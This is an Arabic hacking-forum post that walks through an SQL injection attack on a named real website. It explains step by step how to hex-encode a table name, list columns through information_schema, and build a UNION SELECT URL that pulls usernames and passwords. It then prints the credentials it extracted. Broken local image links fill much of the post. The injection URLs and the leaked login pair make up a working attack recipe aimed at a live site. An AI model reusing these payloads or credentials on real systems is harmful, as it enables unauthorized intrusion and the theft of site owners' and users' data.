عرض مشاركة واحدة
قديم 03-19-2012, 02:46 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
ضمير العراقي
 
الصورة الرمزية ضمير العراقي
 

 

 
إحصائية العضو






ضمير العراقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ضمير العراقي is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول



الان يظهر لنا
file_users[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/tongue.gif[/IMG]ass:darkdb
الان نعرف ماذا ظهر لنا
file_users:اسم الجدول
pass:هذا اسم عمود الباسورد لي انحنة طلعناه
darkdb:غير مهمة
الان طلعنة اسم الباسورد والان نظلع عمود اليوزر كيف اولا
نذهب لهذا الموقع
http://waraxe.us/sql-char-encoder.html
ونشفر كلمة
file_users
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/5kd65kqqvzvsi2htbyu7.png[/IMG]

[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/0inwhy9lip907ip491tk.png[/IMG]
عندما نذهب الى الموقع نضع الكلمة المراد تشفيرها في الخانة الولى ونضغط
Encode now
الان نحضر التشفير من ثاني خانة على اليسار
0x66696c655f7573657273
هذا التشفير
الان نظع الامر تالي بدل الامر
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)
نمسحة ونضع الاتي
where+table_name=xxxx
مع تغير xxx
الى التشقير فيصبح
where+table_name=0x66696c655f7573657273
وفائتة هذا الامر هو لاظهار عمود اليوزر
فيصبح الموقع

http://modules.t-o-m-e.net/module.ph...5f7573657273--
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/58p8t6drc5hq2kcx2n.png[/IMG]
file_users:name:darkdb
الان ظهر الانةfile_users:name:darkdb
name:هذا عمود اليوزر
الان سوف نظهر اليوزر والباسورد
الان نحذف هذا كلة
information_schema.columns+where+table_name=0x6669 6c655f7573657273
ونضع بدلة
file_users
يعني يقول لة احضر من هذا الجدول
ونحذف من الامر
Concat(table_name,0x3a,column_name,0x3a,table_sche ma)
نحف
table_name,0x3a,column_name
ونظع بدلة
اسم عمود اليوزر وهو
name
يعني يصبح احضر من الجدول هذا اليوزر
ونحذف
table_schema
ونظع بدلة اسم عمود الباسورد وهو
pass
يعني يقول لة احضر الباسورد من الجدول هذا
فلخلاصة هي تقول الحقنة ان تحضر من الجدول file_users اليوزر هو name والباسورد هو pass
فيصبح الموقع
http://modules.t-o-m-e.net/module.php?id=-52+Union+Select+1,2,3,Concat(name,0x3a,pass),5,6,7 ,8,9,10,11,12,13+from+file_users--
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/zggettd5u8om0cbeyq04.png[/IMG]
مبرووووووووووووووووك عليك
darkgod:filezzz

darkgod:اليوزر
filezzz:الباسورد

التوقيع

http://www6.0zz0.com/2011/07/25/18/284358811.gif

 


التعديل الأخير تم بواسطة ضمير العراقي ; 03-19-2012 الساعة 02:49 PM.

   

رد مع اقتباس